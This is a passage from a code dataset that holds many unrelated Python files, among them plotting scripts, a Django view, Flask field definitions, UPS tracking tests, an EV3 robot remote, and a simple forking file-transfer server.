\\\n\t\t\tsum([coordinate ** 2.0 for coordinate in third_vector]) ** 0.5\n\t\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tself.__area = \\\n\t\t\t(half_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)) ** 0.5\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t@property\n\tdef vertices(self):\n\t\treturn self.__vertices\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef penalty(self):\n\t\treturn self.__penalty\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef impassability(self):\n\t\treturn self.__impassability\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef normal(self):\n\t\treturn self.__normal\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area(self):\n\t\treturn self.__area\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\tdef get_projection(self):\n\t\tvertices = \\\n\t\t\t[vertex[0] + vertex[1] * 1.0j for vertex \\\n\t\t\t\tin self.__vertices]\n\t\t\t\t\n\t\t\t\t\n\t\tfirst_length = abs(vertices[1] - vertices[0])\n\t\tsecond_length = abs(vertices[2] - vertices[1])\n\t\tthird_length = abs(vertices[0] - vertices[2])\n\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tarea = \\\n\t\t\t(half_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)) ** 0.5\n\t\t\t\t\n\t\t\t\t\n\t\tpolygon_projection = \\\n\t\t\tPolygonProjection(\n\t\t\t\tvertices,\n\t\t\t\tself,\n\t\t\t\tself.area / area\n\t\t\t)\n\t\t\t\n\t\treturn polygon_projection\n\t\t","sub_path":"planning/surface/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"35746394","text":"import numpy as np\nimport sys\ninputfile = 'input.txt'\noutfile = sys.stdout\n\ndef scale(mat, baseval = 1.) :\n nrows, ncols = mat.shape\n for i in range(0,nrows) :\n maxindex = np.argmax(mat[i,:])\n mat[i] = mat[i]/mat[i,maxindex]\n return mat","sub_path":"scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"220127924","text":"#purpose: to find the number of trailing zeroes for a number x factorial\r\n#Author: Joshua Steier\r\n#10/9/2016\r\ndef zeroes(x):\r\n five = 0\r\n for number in range(2, x + 1):\r\n while number > 0:\r\n if number % 5 ==0:\r\n five= five + 1\r\n number = number / 5\r\n else:\r\n break\r\n return five","sub_path":"trailingzeroes.py","file_name":"trailingzeroes.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34825389","text":"import json\nimport os\n\nfrom yahoo_finance import Share\n\nsymbol = open('symbol.txt', 'r')\nfor line in symbol:\n name = line[:-1]\n yahoo = Share(name)\n with open(os.path.join('data', name + '.json'), 'w+') as outfile:\n json.dump(yahoo.get_historical('2010-01-01', '2014-12-31'), outfile)\n outfile.close()\nsymbol.close()\n","sub_path":"yahoo.py","file_name":"yahoo.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"120021772","text":"import pandas as pd\nfrom fileLoading import loadExcel, readCsv\nimport os\nfrom dateConv import visitToDatetime, createDatetime\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime as dt\nfrom pandas.plotting import register_matplotlib_converters\nimport matplotlib.dates as mdates # For formatting date\n\nregister_matplotlib_converters()\n\n# import the data\nroot = r'C:\\Users\\ARL\\Desktop\\Jashan\\Summit\\analyses\\Data'\ndatapath = os.path.join(root, 'TAWO_visit_log.xlsx')\nvisits = loadExcel(datapath)\nconcpath = os.path.join(root, 'ethane.txt')\nethane = readCsv(concpath)\n\n# data cleaning\ndates = visits['Date'].values\ndates = dates[1:]\nbadcols = ['Initials', 'Unnamed: 5', 'Date']\nvisits.drop(badcols, axis=1, inplace=True)\nvisits.drop([0], axis=0, inplace=True)\nvisits.dropna(axis=0, how='all', inplace=True)\nvisits.reset_index(drop=True, inplace=True)\n\nethane.columns = ['yr', 'mo', 'dy', 'hr', 'na', 'val']\n\n\n# create proper datetimes\nvisits['start'], visits['end'] = visitToDatetime(dates,\n visits['Arrival time (Z)'].values,\n visits['Departure time (Z)'].values)\nethane['datetime'] = createDatetime(ethane['yr'].values, ethane['mo'].values,\n ethane['dy'].values, ethane['hr'].values)\n\n# ethane cleaning\nethane.drop(['yr', 'mo', 'dy', 'hr', 'na'], axis=1, inplace=True)\nethane.dropna(how='any', inplace=True)\nethane.reset_index(drop=True, inplace=True)\n\n# remove leftover columns\nbadcols = ['Arrival time (Z)', 'Departure time (Z)']\nvisits.drop(badcols, axis=1, inplace=True)\n\n# calculate middle date time\nvisits['datetime'] = visits['start'] + (visits['end'] - visits['start'])/2\n\n\ncombo = pd.merge_asof(visits.sort_values('datetime'),\n ethane.sort_values('datetime'),\n on='datetime', direction='nearest',\n tolerance=pd.Timedelta('3 hour'))\ncombo.dropna(axis=0, how='any', inplace=True)\nethane = ethane[ethane['datetime'] > dt.datetime(2019, 1, 1, 1)]\n\nsns.set(style=\"whitegrid\")\nf, ax = plt.subplots(figsize=(9, 9))\nsns.despine(f, left=True, bottom=True)\nsns.scatterplot(x='datetime', y='val', data=combo, hue='# persons', ax=ax, s=70, zorder=5,\n palette='seismic',\n hue_norm=(0, 6))\nsns.scatterplot(x='datetime', y='val', data=ethane, ax=ax, s=25, alpha=0.5, color='red', label='Background Values')\nplt.title('TAWO Vistor Log Correlation')\nplt.xlabel('')\nplt.ylabel('Ethane Mixing Ratio (ppb)')\n\n# New xticks plot\nmonths = mdates.MonthLocator() # Add tick every month\ndays = mdates.DayLocator(range(1, 32, 5)) # Add tick every 5th day in a month\nmonthFmt = mdates.DateFormatter('%b') # Use abbreviated month name\n\n# Add the locators to the axis\nax.xaxis.set_major_locator(months)\nax.xaxis.set_major_formatter(monthFmt)\nax.xaxis.set_minor_locator(days)\n\nplt.xlim(dt.datetime(2019, 4, 30), dt.datetime(2019, 7, 1))\nplt.legend()\n\nplt.show()\n\nprint('debug point')\n","sub_path":"analyses/tawoPollution/pollutionCheckEthane.py","file_name":"pollutionCheckEthane.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39950244","text":"\"\"\"\nRunning a rocketsled optimization where the objective function has a categorical\nargument.\n\n--------------------------------------------------------------------------\nThe following workflow is only one Firework (one job), for example purposes.\nHowever, FireWorks and rocketsled are capable of handling more complex\nworkflows including multiple jobs and advanced dependencies. Please see the\nFireworks and rocketsled documentation pages for more information:\n\nhttps://hackingmaterials.github.io/rocketsled/\nhttps://materialsproject.github.io/fireworks/\n\"\"\"\n\nfrom fireworks.core.rocket_launcher import rapidfire\nfrom fireworks import Workflow, Firework, LaunchPad\n\nfrom rocketsled import OptTask\nfrom rocketsled.examples.tasks import MixedCalculateTask\n\nopt_label = \"opt_categorical\"\nlpad = LaunchPad(name='rsled')\ndims = [(1, 2), (1, 2), (1, 2), (\"red\", \"green\", \"blue\")]\n\n\ndef wf_creator(x):\n fw1_spec = {'A': x[0], 'B': x[1], 'C': x[2], 'D': x[3], '_x': x}\n\n # CalculateTask writes _y field to the spec internally.\n\n firework1 = Firework([MixedCalculateTask(),\n OptTask(wf_creator='rocketsled.examples.categorical.'\n 'wf_creator',\n dimensions=dims,\n lpad=lpad,\n get_z='rocketsled.examples.categorical.'\n 'get_z',\n duplicate_check=True,\n opt_label=opt_label)],\n spec=fw1_spec)\n return Workflow([firework1])\n\n\ndef get_z(x):\n if x[1] == 1:\n cat = \"tiger\"\n else:\n cat = \"lion\"\n return [x[0] ** 2, cat]\n\n\nif __name__ == \"__main__\":\n lpad.reset(password=None, require_password=False)\n lpad.add_wf(wf_creator([1, 1, 2, \"red\"]))\n rapidfire(lpad, nlaunches=23, sleep_time=0)\n","sub_path":"rocketsled/examples/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243311410","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\n\n# Create your views here.\n\nfrom .models import Movie\n\nclass MoviesView(View):\n \"\"\"Список фильмов \"\"\"\n\n def get(self,request):\n movies = Movie.objects.all()\n return render(request, 'movies/movies.html', {'movie_list': movies})\n\n\nclass MovieDetailView(View):\n\n def get(self,request,slug):\n movie = Movie.objects.get(url=slug)\n return render(request,'movies/moviesingle.html',{'movie': movie})","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301072937","text":"# With Statement\n# Good for running something and then end it, resource management\n# Usually used to replace try & finally\n\n# With Statement:\nwith open('hello.txt','w') as f:\n\tf.write('hello, world!')\n\n# Without With Statement:\nf = open('hello.txt','w')\ntry:\n\tf.write('Hello, World')\nfinally:\n\tf.close()\n\n\n# Supporting with in your own objects\n# Create __enter__ and __exit__ methods to an object if you want to use it to function as a context manager\n# Context Manger - A way to manage & allocate resources","sub_path":"python/python_tricks/with_statement.py","file_name":"with_statement.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"556921194","text":"from flask.ext.restful import fields\r\nfrom app.utils.gis_json_fields import PointToLatLng, PolygonToLatLng\r\nfrom app.authentication.fields import user_fields\r\nfrom copy import copy\r\n\r\nsuccess_fields = dict(\r\n status=fields.String,\r\n message=fields.String,\r\n)\r\n\r\nupdate_fields = dict(\r\n status=fields.String,\r\n message=fields.String,\r\n date_modified=fields.DateTime(\"iso8601\")\r\n)\r\n\r\ncontractor_fields = dict(\r\n id=fields.Integer,\r\n name=fields.String\r\n)\r\n\r\nproject_fields = dict(\r\n id=fields.Integer,\r\n project_name=fields.String,\r\n project_address=fields.String,\r\n project_status=fields.String,\r\n project_manager=fields.Nested(user_fields, allow_null=False),\r\n contractor=fields.Nested(contractor_fields, allow_null=False),\r\n property_owner=fields.String,\r\n authority_having_jurisdiction_or_bldg_dept=fields.String,\r\n civicsolar_account_manager=fields.Nested(user_fields, allow_null=False),\r\n utility=fields.String,\r\n coordinates=PointToLatLng(attribute='coordinates'),\r\n area=PolygonToLatLng(attribute='area'),\r\n date_created=fields.DateTime(\"iso8601\"),\r\n date_modified=fields.DateTime(\"iso8601\")\r\n)\r\n\r\nproject_create_fields = dict(\r\n status=fields.String,\r\n message=fields.String,\r\n project=fields.Nested(project_fields, allow_null=False)\r\n)\r\n\r\n# project_file_fields = dict(\r\n# id=fields.Integer,\r\n# section_id=fields.Integer,\r\n# modelname=fields.String,\r\n# filename=fields.String,\r\n# filetype=fields.String,\r\n# coordinates=PointToLatLng(attribute='coordinates'),\r\n# heading=fields.Integer,\r\n# date_created=fields.DateTime(\"iso8601\"),\r\n# date_modified=fields.DateTime(\"iso8601\")\r\n# )\r\n\r\nproject_complete_fields = copy(project_fields)\r\nproject_complete_fields[\"sections\"] = fields.Raw\r\nproject_complete_fields[\"section_files\"] = fields.Raw\r\n","sub_path":"app/home/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"494623699","text":"__author__ = 'scottumsted'\n\nfrom unittest import TestCase\nfrom carrierservices.UpsServices import UpsServices\n\n\nclass TestUpsServices(TestCase):\n ups_good1 = '1Z98A25FP202057811'\n ups_good2 = '1Z5755816893302595'\n ups_good3 = '1Z36926X0318583063'\n ups_good4 = '1zr038r30365320384'\n ups_good5 = '1za7r9269029685221'\n ups_goods = [\n ups_good1,\n ups_good2,\n ups_good3,\n ups_good4,\n ups_good5\n ]\n ups_bad1 = '9212391234567812345570'\n ups_bad2 = '5570'\n ups_bad3 = '9612391234567812345570'\n ups_bad4 = '9312391234567812345570'\n ups_bad5 = '9912391234567812345570'\n ups_bad6 = '1Z36926X0318583064'\n ups_bad7 = '1zr038r30365320584'\n ups_bads = [\n ups_bad1,\n ups_bad2,\n ups_bad3,\n ups_bad4,\n ups_bad5,\n ups_bad6,\n ups_bad7,\n None\n ]\n\n def test_positive_ups_is_carrier(self):\n check = True\n for good in self.ups_goods:\n check = UpsServices.is_carrier(good) and check\n self.assertTrue(check, 'positive ups check failed for %s' % str(good))\n\n def test_negative_ups_is_carrier(self):\n check = False\n for bad in self.ups_bads:\n check = UpsServices.is_carrier(bad) or check\n self.assertFalse(check, 'negative ups check failed for %s' % str(bad))\n\n def test_positive_ups_track(self):\n for good in self.ups_goods:\n fs = UpsServices(good)\n results = fs.track()\n self.assertIsNotNone(results, 'positive ups track failed, None results, for %s' % str(good))\n self.assertTrue('success' in results and results['success'],\n 'positive ups track failed, success not true, for %s' % str(good))\n","sub_path":"tests/test_upsServices.py","file_name":"test_upsServices.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"426688644","text":"import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport operator\n\nfig = plt.figure(figsize=(5,5))\nax = plt.axes()\na=.5\nb=1\n\nx=np.zeros(101)\ny=np.zeros(101)\nx2=np.zeros(101)\ny2=np.zeros(101)\n\n\nfor i in range(0,101):\n x[i]=i/50.0-1\n y[i]=math.sqrt(1-x[i]**2)*1\n\n\nr1=28\nr2=19\nr3=5\n\nplt.plot(x*r1,-y*r1,'y',lw=4)\nplt.plot(-x*r1,y*r1,'y',lw=4)\nplt.plot(x*r2,-y*r2,'b')\nplt.plot(-x*r2,y*r2,'b')\nplt.plot(x*r3,-y*r3,'r')\nplt.plot(-x*r3,y*r3,'r')\nax.arrow(r1/math.sqrt(2), r1/math.sqrt(2), -4,-4, head_width=3, head_length=3, fc='g', ec='g',lw=3)\nax.fill_between(x*r1,y*r1,-y*r1,hatch=\"X\",color=\"none\",edgecolor=\"c\")\nax.fill_between(x*r2*1.1,y*r2*1.1,-y*r2*1.1,hatch=\"X\",color=\"b\",edgecolor=\"c\")\nax.fill_between(x*r2,y*r2,-y*r2,color=\"m\",edgecolor=\"none\")\nax.fill_between(x*r3,y*r3,-y*r3,color=\"r\",edgecolor=\"none\")\n\nax.annotate(r'$\\rm{increasingly}$', xy=(0, 12), xytext=(22, 24), color='g')\nax.annotate(r'$\\rm{heavy}$', xy=(0, 12), xytext=(22, 21), color='g')\nax.annotate(r'$\\rm{nuclei}$', xy=(0, 12), xytext=(22, 18), color='g')\n\n#plt.plot(x*r2,-y*r2,'b',lw=3)\n#plt.plot(-x*r2,y*r2,'b',lw=3)\n#ax.fill_between(x*r1,y*r1,-y*r1,hatch=\"X\",color=\"b\",edgecolor=\"c\")\nax.annotate(r'$\\rm{free}$ $\\rm{neutrons}$', xy=(0, 12), xytext=(-37, 0), color='b')\nax.annotate(r'$\\rm{neutron}$ $\\rm{drip}$', xy=(0, 12), xytext=(-37, 3), color='b')\n\n\nplt.gca().axison = False\nax.annotate(r'$\\rm{atmosphere}$', xy=(0, 12), xytext=(-10, 30), color='y')\nax.annotate(r'$\\rm{lattice}$ $\\rm{nuclei}$ $\\rm{crust}$', xy=(0, 12), xytext=(-10, 22), color='k')\nax.annotate(r'$\\rm{neutron}$ $\\rm{superfluid}$', xy=(0, 12), xytext=(-12, 13), color='k')\nax.annotate(r'$95\\%$ $\\rm{neutrons}$', xy=(0, 12), xytext=(-12, 10), color='k')\nax.annotate(r'$\\rm{(proton}$ $\\rm{superconductor)}$', xy=(0, 11), xytext=(-12, 7), color='k')\nax.annotate(r'$\\rm{inner}$', xy=(0, 12), xytext=(-3, 1), color='k')\nax.annotate(r'$\\rm{core}$', xy=(0, 12), xytext=(-3, -1), color='k')\nplt.xlim([-30,30])\nplt.ylim([-30,30])\nplt.savefig('pulsar.eps')\nplt.show()\n","sub_path":"code/pulsar.py","file_name":"pulsar.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366072963","text":"\"\"\"\nDaniel Johnson\nManually controlled to move around. When a beacon is detected at any time, the robot ignores manual controls and drives\nto and picks up the beacon, showing a progress bar on how close it is to the beacon.\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk, HORIZONTAL\nimport mqtt_remote_method_calls as com\n\n\nclass PCDelegate(object):\n def __init__(self, progressbar, bar_var):\n self.detect_beacon = False\n self.original_distance = -1\n self.percent_travel = 0\n self.progressbar = progressbar\n self.bar_var = bar_var\n self.pre_percent = 0\n\n def distance_from_beacon(self, current_distance):\n if not self.detect_beacon:\n self.detect_beacon = True\n self.original_distance = current_distance\n else:\n self.pre_percent = self.percent_travel\n self.distance = current_distance\n self.percent_travel = (1-self.distance/self.original_distance) * 100\n #some way to have the progressbar value equal self.percent_travel\n self.bar_var = self.percent_travel\n self.progressbar.step(self.percent_travel - self.pre_percent)\n\n\ndef main():\n print('Project Testing')\n root = tkinter.Tk()\n root.title(\"MQTT Remote\")\n main_frame = ttk.Frame(root, padding=5)\n main_frame.grid()\n description = \"Seagull O' Meter\"\n label = ttk.Label(main_frame, text=description)\n label.grid(columnspan=2)\n bar_var = 0\n progressbar = ttk.Progressbar(root,orient = HORIZONTAL, variable = bar_var, length = 100)\n progressbar.grid(columnspan=10)\n main_frame = ttk.Frame(root, padding=20, relief='raised')\n main_frame.grid()\n my_delegate = PCDelegate(progressbar, bar_var)\n mqtt_client = com.MqttClient(my_delegate)\n mqtt_client.connect_to_ev3()\n speed_label = ttk.Label(main_frame, text=\"Speed\")\n speed_label.grid(row=0, column=1)\n speed_entry = ttk.Entry(main_frame, width=8, justify=tkinter.RIGHT)\n speed_entry.insert(0, \"600\")\n speed_entry.grid(row=1, column=1)\n\n forward_button = ttk.Button(main_frame, text=\"Forward\")\n forward_button.grid(row=2, column=1)\n # forward_button and '' key is done for your here...\n forward_button['command'] = lambda: go_forward(mqtt_client, speed_entry)\n root.bind('', lambda event: go_forward(mqtt_client, speed_entry))\n\n left_button = ttk.Button(main_frame, text=\"Left\")\n left_button.grid(row=3, column=0)\n # left_button and '' key\n left_button['command'] = lambda: go_left(mqtt_client, speed_entry)\n root.bind('', lambda event: go_left(mqtt_client, speed_entry))\n\n stop_button = ttk.Button(main_frame, text=\"Stop\")\n stop_button.grid(row=3, column=1)\n # stop_button and '' key (note, does not need left_speed_entry, right_speed_entry)\n stop_button['command'] = lambda: stop(mqtt_client)\n root.bind('', lambda event: stop(mqtt_client))\n\n right_button = ttk.Button(main_frame, text=\"Right\")\n right_button.grid(row=3, column=2)\n # right_button and '' key\n right_button['command'] = lambda: go_right(mqtt_client, speed_entry)\n root.bind('', lambda event: go_right(mqtt_client, speed_entry))\n\n back_button = ttk.Button(main_frame, text=\"Back\")\n back_button.grid(row=4, column=1)\n # back_button and '' key\n back_button['command'] = lambda: go_backward(mqtt_client, speed_entry)\n root.bind('', lambda event: go_backward(mqtt_client, speed_entry))\n\n up_button = ttk.Button(main_frame, text=\"Up\")\n up_button.grid(row=5, column=0)\n up_button['command'] = lambda: send_up(mqtt_client)\n root.bind('', lambda event: send_up(mqtt_client))\n\n down_button = ttk.Button(main_frame, text=\"Down\")\n down_button.grid(row=6, column=0)\n down_button['command'] = lambda: send_down(mqtt_client)\n root.bind('', lambda event: send_down(mqtt_client))\n\n # Buttons for quit and exit\n q_button = ttk.Button(main_frame, text=\"Quit\")\n q_button.grid(row=5, column=2)\n q_button['command'] = (lambda: quit_program(mqtt_client, False))\n\n e_button = ttk.Button(main_frame, text=\"Exit\")\n e_button.grid(row=6, column=2)\n e_button['command'] = (lambda: quit_program(mqtt_client, True))\n root.mainloop()\n\n\n# callbacks\ndef send_up(mqtt_client):\n print(\"arm_up\")\n mqtt_client.send_message(\"arm_up\")\n\n\ndef send_down(mqtt_client):\n print(\"arm_down\")\n mqtt_client.send_message(\"arm_down\")\n\n\ndef go_forward(mqtt_client, speed_entry):\n print(\"forward\")\n mqtt_client.send_message(\"forward\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"forward\"\n\n\ndef go_right(mqtt_client, speed_entry):\n print(\"right\")\n mqtt_client.send_message(\"right\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"right\"\n\n\ndef stop(mqtt_client):\n print(\"stop\")\n mqtt_client.send_message(\"stop\")\n turtleState = \"stop\"\n\n\ndef go_left(mqtt_client, speed_entry):\n print(\"left\")\n mqtt_client.send_message(\"left\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"left\"\n\n\ndef go_backward(mqtt_client, speed_entry):\n print(\"back\")\n mqtt_client.send_message(\"back\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = 'backward'\n\n\n# Quit and Exit button callbacks\ndef quit_program(mqtt_client, shutdown_ev3):\n if shutdown_ev3:\n print(\"shutdown\")\n mqtt_client.send_message(\"shutdown\")\n mqtt_client.close()\n exit()\n\n\nmain()","sub_path":"projects/johnsod4/DanielProject.py","file_name":"DanielProject.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"43843027","text":"#!/usr/bin/env python3\n\n# server.py\n# The server\n\nfrom common import *\nimport os\nimport posixpath\nimport signal\nimport socket\nimport subprocess\nimport sys\nimport time\n\n# Default IPs and ports to bind to\nserver_ip = \"\"\nserver_port = 2112\n\n# Sockets\nsock_welcome = None\nsock_cli = None\nsock_data = None\n\nis_worker = False\nconn_workers = set()\n\ndef usage():\n abort(usage.message)\nusage.message = \"\"\"Usage:\n server.py \n server.py \n\"\"\"\n\n# Send data (bytes) across sock_data to data_ip:data_port\ndef send_data(data_ip, data_port, data):\n global sock_data\n # Connect to the client's data socket\n sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n debug(\"[send_data] Attempting to connect to %s:%d\" %(data_ip, data_port))\n sock_data.connect((data_ip, data_port))\n debug(\"[send_data] Success!\")\n # Send 510 with data length\n send_msg(sock_cli, MSG_510 % (len(data)))\n # Send data\n sock_data.sendall(data)\n sock_data.close()\n\n# Check the path to see if it is under PWD\ndef check_path(path):\n pwd = posixpath.abspath(os.getcwd()) + \"/\"\n apath = posixpath.abspath(path) + \"/\"\n return apath.find(pwd) == 0\n\n# Check the file to see if it is under PWD\ndef check_file(filename):\n pwd = posixpath.abspath(os.getcwd()) + \"/\"\n apath = posixpath.abspath(filename)\n if (apath.find(pwd) == 0):\n # The file is under PWD. Check to make sure it is a file\n return posixpath.isfile(apath)\n else:\n # The file is not under PWD.\n return False\n\n# PUT command\n# params is the tuple of parameters passed in the 200 MSG\n# data_ip is the IP address of the client's data connection\ndef put(params, data_ip):\n global sock_data\n if len(params) < 5:\n send_msg(sock_cli, MSG_800)\n return False\n data_port = int(params[2])\n length = int(params[3])\n path = params[4]\n # Connect to the client's data socket\n sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n debug(\"[put] Attempting to connect to %s:%d\" %(data_ip, data_port))\n sock_data.connect((data_ip, data_port))\n debug(\"[put] Success!\")\n if not check_path(path):\n # Don't write it! It's not under PWD\n send_msg(sock_cli, MSG_290 %(path))\n sock_data.close()\n return False\n # Open the file\n try:\n fd = open(path, \"wb\")\n # Send 510 with data length\n send_msg(sock_cli, MSG_510 % (-1))\n bytesrecv = 0\n while bytesrecv < length:\n length_block = min(length - bytesrecv, 4096)\n debug(\"[put] Receiving block...\")\n block = recv_block(sock_data, length_block)\n if block is None:\n # Client hung up\n send_msg(sock_cli, MSG_590)\n sock_data.close()\n return False\n fd.write(block)\n bytesrecv += length_block\n fd.close()\n except(OSError):\n # Permission problems\n send_msg(sock_cli, MSG_290)\n sock_data.close()\n return False\n # Send a 520 Success\n send_msg(sock_cli, MSG_520)\n sock_data.close()\n return True\n\n# LS command\n# params is the tuple of parameters passed in the 300 MSG\n# data_ip is the IP address of the client's data connection\ndef ls(params, data_ip):\n if len(params) < 4:\n send_msg(sock_cli, MSG_800)\n return False\n data_port = int(params[2])\n path = params[3]\n # Check the path\n if check_path(path):\n # Run ls -la\n ls_data = subprocess.Popen(\n [\"ls\", \"-al\", \"--\", path],\n universal_newlines=False,\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE).stdout.read()\n send_data(data_ip, data_port, ls_data)\n # Send a 520 Success\n send_msg(sock_cli, MSG_520)\n return True\n else:\n # Don't list the path. It's not under PWD\n send_data(data_ip, data_port, \"Permission denied!\\n\".encode())\n send_msg(sock_cli, MSG_390 %(path))\n return False\n \n# GET command\ndef get(params, data_ip):\n global sock_data\n if len(params) < 4:\n send_msg(sock_cli, MSG_800)\n return False\n data_port = int(params[2])\n filename = params[3]\n if check_file(filename):\n info(\"Your file has been found\")\n fo = open(filename, mode='rb')\n filesize = os.stat(filename).st_size\n # MAX_BYTES should be used here instead of 512\n bytes_read = fo.read(512)\n # Connect to the client's data socket\n sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n debug(\"[send_data] Attempting to connect to %s:%d\" %(data_ip, data_port))\n sock_data.connect((data_ip, data_port))\n debug(\"[send_data] Success!\")\n # Send 510 with data length\n send_msg(sock_cli, MSG_510 % filesize)\n bytes_sent = 0\n while (bytes_sent < filesize):\n # Send data\n sock_data.sendall(bytes_read)\n bytes_sent += len(bytes_read)\n bytes_read = fo.read(512)\n # Send a 520 Success\n send_msg(sock_cli, MSG_520)\n sock_data.close()\n return True\n else:\n info(\"[get] Not a file, or you're not allowed to look in this path\")\n send_data(data_ip, data_port, \"\".encode())\n send_msg(sock_cli, MSG_190 %(filename))\n return False\n\ndef handle_session(addr):\n info(\"[handle_session] Handling connection from %s:%d\" %(addr[0], addr[1]))\n while True:\n message = recv_msg(sock_cli)\n if message is None or len(message) < 1:\n # Gracefully terminate\n sock_cli.close()\n break\n elif message[0] == \"200\":\n # PUT\n put(message, addr[0])\n elif message[0] == \"300\":\n # LS\n ls(message, addr[0])\n elif message[0] == \"800\":\n # What you say!!\n pass\n elif message[0] == \"900\":\n # BYE message. Quit.\n sock_cli.close()\n break\n elif message[0] == \"100\":\n # GET\n get(message, addr[0])\n else:\n # Send the 800 response (What you say!!)\n send_msg(sock_cli, MSG_800)\n\ndef main():\n global sock_welcome, sock_cli, server_ip, server_port, is_worker, conn_workers\n\n # Parse CLI parameters\n if len(sys.argv) < 2: usage()\n elif len(sys.argv) == 2:\n server_port = int(sys.argv[1])\n elif len(sys.argv) >= 3:\n server_ip = sys.argv[1]\n server_port = int(sys.argv[2])\n\n # Create the welcome socket\n sock_welcome = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock_welcome.bind((server_ip, server_port))\n sock_welcome.listen(1)\n\n info(\"[main] Listening on %s:%d\" %(server_ip, server_port))\n\n # Accept connections\n while True:\n info(\"[main] Awaiting connection...\")\n try:\n sock_cli, addr = sock_welcome.accept()\n except (InterruptedError):\n continue\n info(\"[main] Accepted connection from %s:%d\" %(addr[0], addr[1]))\n # This is where you and the client talk\n pid_child = os.fork()\n if pid_child == 0:\n # Child\n is_worker = True\n conn_workers = set()\n handle_session(addr)\n sys.exit(0)\n else:\n # Parent\n conn_workers.add(pid_child)\n info(\"[main] Forking child PID %d\" %(pid_child))\n\n# Clean things up before terminating\ndef shutdown(kill_children=False):\n info(\"[shutdown] Shutting down...\")\n if is_worker:\n if not sock_cli is None: sock_cli.close()\n if not sock_data is None: sock_data.close()\n else:\n if(kill_children):\n info(\"[shutdown] Killing child workers\")\n # Turn off child reaping b/c we do it here.\n signal.signal(signal.SIGCHLD, signal.SIG_DFL)\n for pid in conn_workers:\n info(\"[shutdown] Sending SIGTERM to %d\" %(pid))\n os.kill(pid, signal.SIGTERM)\n os.waitpid(pid, 0)\n if not sock_welcome is None: sock_welcome.close()\n\n# Signal handlers\ndef handle_kill(sig, frame):\n info(\"[handle_kill] Received signal %d.\" %(sig))\n # This will actually raise an exception, which throws control\n # back to shutdown (see the end of the file).\n sys.exit(0)\ndef reap_children(sig, frame):\n # See \n while True:\n try:\n status = os.waitpid(-1, os.WNOHANG)\n pid = status[0]\n if pid <= 0:\n break;\n conn_workers.discard(pid)\n info(\"[reap_children] reaping PID %d\" %(pid))\n except(ChildProcessError):\n break;\nsignal.signal(signal.SIGTERM, handle_kill)\nsignal.signal(signal.SIGQUIT, handle_kill)\nsignal.signal(signal.SIGHUP, handle_kill)\nsignal.signal(signal.SIGCHLD, reap_children)\n\nif __name__ == \"__main__\":\n try: main()\n except(KeyboardInterrupt):\n # KeyboardInterrupt exits normally\n # The KeyboardInterrupt propagates to all children\n shutdown(kill_children=False)\n except:\n # Everything else is an error and should print a stackdump\n # (Except for sys.exit(0), which also dumps control here)\n shutdown(kill_children=True)\n raise\n","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"577805404","text":"import sys\nimport wave\nfrom threading import Thread\n\nimport np as np\nimport numpy as np\nimport scipy.io as 